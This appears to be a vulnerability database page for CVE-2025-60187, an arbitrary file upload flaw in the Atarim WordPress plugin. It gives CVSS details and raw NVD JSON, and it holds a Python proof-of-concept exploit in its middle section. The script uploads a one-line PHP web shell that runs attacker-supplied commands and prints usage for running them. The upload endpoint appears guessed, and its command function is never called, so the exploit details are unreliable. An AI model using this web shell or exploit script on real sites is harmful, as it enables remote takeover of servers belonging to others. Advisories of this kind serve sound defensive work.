Security Vulnerability Report
CVE-2025-60187 CVSS 4.8 MEDIUM

CVE-2025-60187

Published: 2025-11-06 16:16:03
Last Modified: 2026-04-15 00:35:42

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Using Malicious Files. This issue affects Atarim: from n/a through <= 4.2.1.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Atarim Visual Collaboration <= 4.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-60187 PoC - Arbitrary File Upload in Atarim Plugin
# Target: WordPress site with Atarim plugin <= 4.2.1


def upload_shell(target_url, php_payload):
    """
    Upload malicious PHP file to target server
    """
    upload_endpoint = f"{target_url}/wp-content/plugins/atarim-visual-collaboration/upload-handler.php"
    files = {
        'file': ('shell.php', php_payload, 'application/x-php')
    }

    try:
        response = requests.post(upload_endpoint, files=files, timeout=10)

        if response.status_code == 200:
            # Parse response to get uploaded file path
            data = response.json()
            if 'url' in data or 'path' in data:
                uploaded_path = data.get('url') or data.get('path')
                print(f"[+] File uploaded successfully: {uploaded_path}")
                return uploaded_path

        print(f"[-] Upload failed. Status: {response.status_code}")
        return None

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


def execute_command(target_url, cmd):
    """
    Execute command via uploaded shell
    """
    shell_url = f"{target_url}/wp-content/uploads/atarim/shell.php?cmd={cmd}"

    try:
        response = requests.get(shell_url, timeout=10)
        return response.text
    except:
        return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        sys.exit(1)

    target = sys.argv[1]

    # PHP WebShell payload
    php_shell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"

    print(f"[*] Attempting to upload shell to {target}...")
    uploaded = upload_shell(target, php_shell)

    if uploaded:
        print(f"[+] Shell uploaded! Access at: {uploaded}")
        print(f"[+] Example: {uploaded}?cmd=whoami")

References

https://patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-2-arbitrary-file-upload-vulnerability?_s_id=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-60187",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-06T16:16:03.400",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Using Malicious Files.This issue affects Atarim: from n/a through <= 4.2.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 4.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-2-arbitrary-file-upload-vulnerability?_s_id=cve",
        "source": "[email protected]"
      }
    ]
  }
}